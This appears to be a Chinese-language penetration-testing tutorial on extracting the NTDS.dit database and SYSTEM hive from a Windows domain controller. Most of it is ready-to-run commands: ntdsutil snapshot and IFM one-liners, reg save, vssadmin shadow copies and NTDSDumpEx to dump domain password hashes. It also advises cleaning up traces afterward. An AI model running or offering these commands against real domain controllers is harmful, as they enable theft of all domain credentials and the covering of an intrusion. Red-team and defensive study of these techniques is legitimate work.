前言
域用户的哈希值存储在域管服务器的NTDS.DIT的数据库文件中,除此之外还有用户信息和组成员信息。NTDS.dit文件无法直接复制到其他位置进行离线破解和提取(类似于本地存储的SYSTEM),其存储位置为:
C:\Windows\NTDS
本文主要介绍利用域管理服务器命令提取NTDS.dit文件,后续还会有其他工具的使用方法。
Ntdsutil快照
该工具域环境默认安装[Windows 2003及以上]
查看当前快照列表
ntdsutil snapshot "list all" quit quit
创建快照
ntdsutil snapshot "activate instance ntds" create quit quit
注:其中快照的guid需要取出来,挂载快照时使用
挂载快照
ntdsutil snapshot "mount {bad5a98b-45f7-4771-b60e-d7d9ffbad4b9}" quit quit
注:机器中有几块硬盘,那么就会生成几个快照分区,快照分区会以$SNAP_时间_VOLUME{分区名}$进行命名
寻找ntds.dit
一般情况下会在c:\windows\ntds\目录下
注:注意看时间,一定要最近日期的,有一些域控机器上的ntds.dit很古老,那么可能是备份到其他目录下了,需要再找一下,可能…还会遇到磁盘空间不足的情况,自行斟酌。
拷贝ntds.dit
copy C:\$SNAP_202101222002_VOLUMEC$\Windows\NTDS\ntds.dit c:\\
卸载快照
ntdsutil snapshot "unmount {bad5a98b-45f7-4771-b60e-d7d9ffbad4b9}" quit quit
删除快照
ntdsutil snapshot "delete {bad5a98b-45f7-4771-b60e-d7d9ffbad4b9}" quit quit
获取注册表中的system文件
reg save hklm\system c:\system.hive
通过NtdsDumpex.exe提取域用户hash
NTDSDumpEx.exe -d C:\\ntds.dit -s c:\\system.hive -o c:\\hash.txt
拷贝hash
全部结束后记得清理现场
小福利:一句话版本
ntdsutil "ac in ntds" "ifm" "cr fu c:\\windows\temp\temp\" q q
VSSADMIN卷影副本
卷影副本是Windows命令行一种即便被操作系统使用也能够用于管理员备份计算机,卷,文件的实用程序。卷影复制作为服务运行,并要求将文件系统格式化为NTFS,默认情况在所有现代操作系统下都是如此。从Windows命令提示符执行以下操作将创建C:驱动器盘的快照,以便用户访问通常无法访问这些文件,并将其其复制到另一个位置(本地文件夹,网络文件夹或可移动介质)。
注:要有管理员权限
查看卷影列表
vssadmin list shadows
创建卷影列表
vssadmin create shadow /for=c:
获取NDTS.dit和SYSTEM:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\\temp\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\System32\config\SYSTEM c:\\temp\
删除卷影列表
vssadmin Delete Shadows /For=C:
打包拷贝!Get